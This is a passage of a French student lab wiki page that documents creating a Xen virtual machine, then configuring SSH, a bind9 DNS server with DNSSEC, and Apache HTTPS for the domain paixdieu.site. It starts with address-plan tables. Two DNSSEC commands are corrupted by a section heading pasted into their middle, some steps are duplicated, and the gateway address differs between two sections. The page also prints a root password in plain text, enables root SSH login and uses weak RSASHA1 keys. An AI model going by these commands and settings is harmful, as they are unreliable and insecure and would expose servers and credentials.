| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
==Configuration du SSH== &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
==Configuration du DNS==&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
Note : Après avoir constaté que le serveur secondaire ne se mettait pas à jour après chaque &amp;quot;notify&amp;quot; du serveur primaire, nous avons finalement choisi d'utiliser le serveur ns1.belle-rose.site en tant que serveur secondaire. &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.local:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.local&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Nous avons séparés configuration des serveurs autorisés à dupliqué nos zones de la config de nos zones en insérant les acl suivantes dans le fichier /etc/bind/named.conf. &lt;br /&gt;
&lt;br /&gt;
 options {&lt;br /&gt;
	 directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
	 dnssec-validation auto;&lt;br /&gt;
 	 dnssec-enable yes;&lt;br /&gt;
	 dnssec-lookaside auto;&lt;br /&gt;
	 listen-on-v6 { any; };&lt;br /&gt;
	 allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40; //@ de ns6.gandi.net mais plus utilisé au final&lt;br /&gt;
   193.48.57.181; //@ de ns1.belle-rose.site&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns1.belle-rose.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns1.belle-rose.site.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
==HTTPS / Certificat SSL==&lt;br /&gt;
Nous avons ensuite procéder à la création des certificats SSL.&lt;br /&gt;
Nous sommes donc aller sur Gandi, acheter un certificat.&lt;br /&gt;
Pour cela nous avons généré un CSR avec la commande :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout paixdieu.site.key -out paixdieu.site.csr&lt;br /&gt;
&lt;br /&gt;
-newkey tsa:2048 permet de générer une requête CSR et une clé privée utilisant le chiffrement RSA sur 2048 bits.&lt;br /&gt;
&lt;br /&gt;
-keyout paixdieu.site.key permet de sauvegarder le fichier de clé privée sous le nom &amp;quot;paixdieu.site.key&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
-out paixdieu.csr permet de sauvegarder le fichier CSR sous le nom &amp;quot;paixdieu.csr&amp;quot;. &lt;br /&gt;
&lt;br /&gt;
Lors du paramètrage, nous avons bien fait attention à rentrer &amp;quot;paixdieu.site&amp;quot; comme common name pour que le certificat soit validé par gandi.&lt;br /&gt;
Cela se fait en copant le contenu de paixdieu.site.csr dans la fenêtre correspondante lors de l'achat du certificat.&lt;br /&gt;
&lt;br /&gt;
Afin de bien sauvegarder les fichiers utilisés, nous les avvons sauvegarder dans le dossier suivant:&lt;br /&gt;
 ~/save_dns/paixdieu.site.csr&lt;br /&gt;
 ~/save_dns/paixdieu.site.key&lt;br /&gt;
&lt;br /&gt;
'''4.4 Sécurisation de serveur DNS par DNSSEC'''&lt;br /&gt;
&lt;br /&gt;
Activer DNSSEC&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.options on ajoute les lignes :&lt;br /&gt;
 dnssec-validation yes;&lt;br /&gt;
 dnssec-enable yes;&lt;br /&gt;
 dnssec-lookaside auto;&lt;br /&gt;
&lt;br /&gt;
On crée un répertoire /etc/bind/paixdieu.site.dnssed/&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone &lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZO'''4.4 Sécurisation de serveur DNS par DNSSEC'''NE paixdieu.site&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensuite, on crée la clé asymétrique de la zone pour signer les enregistrements :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On renomme les clés :&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.key paixdieu.site-ksk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+17429.private paixdieu.site-ksk.private&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.key paixdieu.site-zsk.key&lt;br /&gt;
 mv Kpaixdieu.site.+005+28633.private paixdieu.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
On les inclue à la suite de /etc/bind/db.paixdieu.site&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-ksk.key&lt;br /&gt;
 $include /etc/bind/paixdieu.site.dnssec/paixdieu.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
Puis incrémente le numéro de série (5=&amp;gt;6)&lt;br /&gt;
&lt;br /&gt;
On signe des enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o paixdieu.site -k paixdie'''4.4 Sécurisation de serveur DNS par DNSSEC'''u.site-ksk ../db.paixdieu.site paixdieu.site-zsk&lt;br /&gt;
&lt;br /&gt;
Prise en compte du fichier signé&lt;br /&gt;
  &lt;br /&gt;
On modifie le fichier /etc/bind/named.conf.local de la manière suivante :&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/db.paixdieu.site.signed&amp;quot;;&lt;br /&gt;
	allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Pour finir, nous allons sur gandi.net, sur notre nom de domaine dans DNSSEC et nous ajoutons les deux clefs (zsk et ksk avec l'algorithme 5 (RSA/SHA-1).&lt;br /&gt;
Et nous vérifions la bon fonctionnement du DNSSEC de la manière suivante :&lt;br /&gt;
 &amp;gt; dnssec-verify -o paixdieu.site db.paixdieu.site.signed&lt;br /&gt;
&lt;br /&gt;
 Loading zone 'paixdieu.site' from file 'db.paixdieu.site.signed'&lt;br /&gt;
&lt;br /&gt;
 Verifying the zone using the following algorithms:&lt;br /&gt;
 - RSASHA1&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                     ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
&lt;br /&gt;
'''4.3 Sécurisation de site web par certificat'''&lt;br /&gt;
&lt;br /&gt;
On active le module SSL&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
On configure le port 443 pour l'HTTPS en remplaçant dans le fichier ''/etc/apache2/ports.conf'' :&lt;br /&gt;
 Listen 80&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
par&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
         Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On place paixdieu.site.key /etc/ssl/private/ et paixdieu.site.crt /etc/ssl/certs/&lt;br /&gt;
&lt;br /&gt;
On crée les liens symboliques pour les certificats&lt;br /&gt;
&lt;br /&gt;
 &amp;gt; c_rehash /etc/ssl/certs&lt;br /&gt;
 Doing /etc/ssl/certs&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
 WARNING: Skipping duplicate certificate ca-certificates.crt&lt;br /&gt;
&lt;br /&gt;
On cofigure apache en ajoutant la ligne suivante dans le fichier /etc/apache2/apache2.conf :&lt;br /&gt;
 ServerName paixdieu.site&lt;br /&gt;
&lt;br /&gt;
On crée le fichier de configuration custom /etc/apache2/sites-available/000-paixdieu.site-ssl.conf :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerName paixdieu.site&lt;br /&gt;
         ServerAlias www.paixdieu.site&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/html &lt;br /&gt;
 	Redirect permanent / https://paixdieu.site/&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
  &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
 	ServerAdmin webmaster@localhost&lt;br /&gt;
 	ServerName paixdieu.site&lt;br /&gt;
 	ServerAlias www.paixdieu.site&lt;br /&gt;
 	DocumentRoot /var/www/html&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/paixdieu.site.crt&lt;br /&gt;
 	SSLCertificateKeyFile /etc/ssl/private/paixdieu.site.key&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous activons le site ssl : &lt;br /&gt;
 a2ensite 000-paixdieu.site-ssl&lt;br /&gt;
&lt;br /&gt;
Nous arrivons bien à nous connecter à https://www.paixdieu.site&lt;br /&gt;
Et un test avec openssl nous renvoie le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 CONNECTED(00000003)&lt;br /&gt;
 Can't use SSL_get_servername&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify error:num=21:unable to verify the first certificate&lt;br /&gt;
 verify return:1&lt;br /&gt;
 depth=0 CN = paixdieu.site&lt;br /&gt;
 verify return:1&lt;br /&gt;
 ---&lt;br /&gt;
 Certificate chain&lt;br /&gt;
 0 s:CN = paixdieu.site&lt;br /&gt;
